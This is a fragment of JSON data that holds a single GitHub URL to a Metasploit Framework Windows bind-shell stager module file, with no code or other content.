"https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb"}]}
